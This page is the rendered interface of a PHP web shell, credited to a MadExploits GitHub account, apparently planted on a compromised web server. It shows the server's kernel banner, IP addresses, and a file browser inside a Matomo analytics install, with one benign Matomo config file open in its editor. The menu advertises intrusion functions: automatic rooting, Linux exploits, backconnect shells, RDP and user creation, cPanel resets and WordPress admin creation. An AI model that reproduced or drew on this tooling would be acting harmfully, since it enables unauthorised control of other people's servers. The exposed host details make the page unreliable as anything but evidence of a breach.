Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.14.134.33
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Tracker /
[ HOME SHELL ]
Name
Size
Permission
Action
Db
[ DIR ]
drwxr-xr-x
Handler
[ DIR ]
drwxr-xr-x
TableLogAction
[ DIR ]
drwxr-xr-x
Visit
[ DIR ]
drwxr-xr-x
Action.php
12.89
KB
-rw-r--r--
ActionPageview.php
2.58
KB
-rw-r--r--
Cache.php
8.96
KB
-rw-r--r--
Db.php
8.99
KB
-rw-r--r--
Failures.php
7.15
KB
-rw-r--r--
FingerprintSalt.php
2.75
KB
-rw-r--r--
GoalManager.php
35.55
KB
-rw-r--r--
Handler.php
2.86
KB
-rw-r--r--
IgnoreCookie.php
2.49
KB
-rw-r--r--
LogTable.php
4.34
KB
-rw-r--r--
Model.php
16.58
KB
-rw-r--r--
PageUrl.php
14.07
KB
-rw-r--r--
Request.php
30.23
KB
-rw-r--r--
RequestProcessor.php
7.43
KB
-rw-r--r--
RequestSet.php
5.05
KB
-rw-r--r--
Response.php
7.75
KB
-rw-r--r--
ScheduledTasksRunner.php
2.86
KB
-rw-r--r--
Settings.php
6.38
KB
-rw-r--r--
TableLogAction.php
10.8
KB
-rw-r--r--
TrackerCodeGenerator.php
12.37
KB
-rw-r--r--
TrackerConfig.php
1.1
KB
-rw-r--r--
Visit.php
22.62
KB
-rw-r--r--
VisitExcluded.php
12.17
KB
-rw-r--r--
VisitInterface.php
595
B
-rw-r--r--
Visitor.php
2.05
KB
-rw-r--r--
VisitorNotFoundInDb.php
243
B
-rw-r--r--
VisitorRecognizer.php
10.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TrackerConfig.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Tracker; use Piwik\Config; class TrackerConfig { /** * Update Tracker config * * @param string $name Setting name * @param mixed $value Value */ public static function setConfigValue($name, $value) { $section = self::getConfig(); $section[$name] = $value; Config::getInstance()->Tracker = $section; } public static function getConfigValue($name, $idSite = null) { $config = self::getConfig(); if (!empty($idSite)) { $siteSpecificConfig = self::getSiteSpecificConfig($idSite); $config = array_merge($config, $siteSpecificConfig); } return $config[$name] ?? null; } private static function getConfig() { return Config::getInstance()->Tracker; } private static function getSiteSpecificConfig($idSite) { $key = 'Tracker_' . $idSite; return Config::getInstance()->$key; } }
Close